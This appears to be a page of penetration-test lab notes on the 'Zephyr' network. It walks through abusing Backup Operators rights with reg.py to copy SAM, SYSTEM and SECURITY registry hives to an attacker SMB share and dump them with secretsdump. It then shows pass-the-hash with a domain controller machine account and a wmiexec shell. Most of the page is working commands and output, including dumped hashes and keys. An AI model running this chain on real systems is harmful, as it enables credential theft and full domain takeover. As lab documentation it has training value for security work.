DACL Abuse - reg.py

We could do it manually if we had shell access. But we can also do it remotely with reg.py. With the Backup Operators privilege. This is the best post to explain it.

First we need to start the SMB server

sudo impacket-smbserver -smb2support share /tmp/share

reg.py works similar to reg.exe on windows to get registry keys and hives

reg.py melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SAM' -o '\\10.10.17.122\share\'

reg.py melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SYSTEM' -o '\\10.10.17.122\share\'

reg.py melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SECURITY' -o '\\10.10.17.122\share\'

It was failing for me when getting it to my machine properly. So instead I sent it to DC's C$ share as I have read access there

reg.py  "melissa":"WinterIsHere2022\!"@192.168.210.16 save -keyName 'HKLM\SAM' -o '//192.168.210.16/C$'

reg.py  "melissa":"WinterIsHere2022\!"@192.168.210.16 save -keyName 'HKLM\SYSTEM' -o '//192.168.210.16/C$'

reg.py  "melissa":"WinterIsHere2022\!"@192.168.210.16 save -keyName 'HKLM\SECURITY' -o '//192.168.210.16/C$'

Then to retrieve it:

smbclient -U internal.zsm.local/melissa //192.168.210.16/C$/

After getting them

secretsdump.py -sam SAM.save -security SECURITY.save -system SYSTEM.save LOCAL -outputfile secretsdump

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xb1223a009047a376c120c3630a0f0e48
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
ZSM.LOCAL/Administrator:$DCC2$10240#Administrator#04a13c983d1c6f2ee43cc9aa0c4d49c6: (2024-12-12 13:40:03)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:dc66f30d3e8bd48b4bfb9c3f53eb66ebda1edbb7af476a9f7650476edce03326b61fabe212dfd9e6c2e06eaaffcab3c78cfd4f47cd564ef53e8eb5d855f9e998c34c5fabc5e713559e090d6e5dc149a97ed653608d5cd07864d7774f2d766512849d4fafff4030324173ccd8cb8c6a1513a348a337c6d46778e4e37bc2e2c2e369626f1f153bdf391f8c175fdae042537016a2198b8c120c738854c907a1ddddcb88aaa517af97bcee783d1d9a36ddc179f2bb5cc8a336a00863183c96384434bb9a8eee781822f51d2727cd14e3fd0841edfa7004eefa2a8e3327b457f34587642e1e91e79a24590d97b8ad6cb14ee7
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf108ba9fcd3554a2abb82ff4a8d29f0679aeaae6
dpapi_userkey:0xe57f2322d588ce987f04d6a3b1bf31cfa35d050a
[*] NL$KM 
 0000   07 E9 F2 3F 08 49 46 07  02 CE 30 4B 65 D3 86 32   ...?.IF...0Ke..2
 0010   6F 02 5D 36 7D E8 30 33  F4 71 94 44 98 37 CB 1A   o.]6}.03.q.D.7..
 0020   05 CC 76 F1 26 E2 94 E7  D3 54 78 1F EF BE E9 13   ..v.&....Tx.....
 0030   30 3B 62 CB A5 57 75 E6  78 F3 D4 55 5C 68 20 15   0;b..Wu.x..U\h .
NL$KM:07e9f23f0849460702ce304b65d386326f025d367de83033f47194449837cb1a05cc76f126e294e7d354781fefbee913303b62cba55775e678f3d4555c682015
[*] Cleaning up...

We get ZSM.LOCAL Domain Administrators hash from previous logon.

ZSM.LOCAL/Administrator:$DCC2$10240#Administrator#04a13c983d1c6f2ee43cc9aa0c4d49c6:

Hash uncrackable. And local administrator hash doesn't allow PtH, atleast on .16 host.

We also get other hashes including machine accounts

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$MACHINE.ACC:plain_password_hex:dc66f30d3e8bd48b4bfb9c3f53eb66ebda1edbb7af476a9f7650476edce03326b61fabe212dfd9e6c2e06eaaffcab3c78cfd4f47cd564ef53e8eb5d855f9e998c34c5fabc5e713559e090d6e5dc149a97ed653608d5cd07864d7774f2d766512849d4fafff4030324173ccd8cb8c6a1513a348a337c6d46778e4e37bc2e2c2e369626f1f153bdf391f8c175fdae042537016a2198b8c120c738854c907a1ddddcb88aaa517af97bcee783d1d9a36ddc179f2bb5cc8a336a00863183c96384434bb9a8eee781822f51d2727cd14e3fd0841edfa7004eefa2a8e3327b457f34587642e1e91e79a24590d97b8ad6cb14ee7
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948
dpapi_machinekey:0xf108ba9fcd3554a2abb82ff4a8d29f0679aeaae6
dpapi_userkey:0xe57f2322d588ce987f04d6a3b1bf31cfa35d050a
NL$KM:07e9f23f0849460702ce304b65d386326f025d367de83033f47194449837cb1a05cc76f126e294e7d354781fefbee913303b62cba55775e678f3d4555c682015

netexec smb 192.168.210.16 -u ZPH-SVRCDC01$ -H d47a6d90e1c5adf4200227514e393948
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\ZPH-SVRCDC01$:d47a6d90e1c5adf4200227514e393948

This is the machine account for the internal DC. So it has privileges to dump hashes from the internal domain itself. And fully compromise it.

secretsdump.py -hashes 'aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948' 'internal.zsm.local/[email protected]'

Internal domain controller pwned!

netexec smb 192.168.210.16 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\Administrator:543beb20a2a579c7714ced68a1760d5e (Pwn3d!)

CME/netexec uses wmiexec.py for the above under the hood, according to this post. So I used it to get a shell.

wmiexec.py internal.zsm.local/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e

PreviousEnumeration NextZEPHYR-DC

Last updated 9 months ago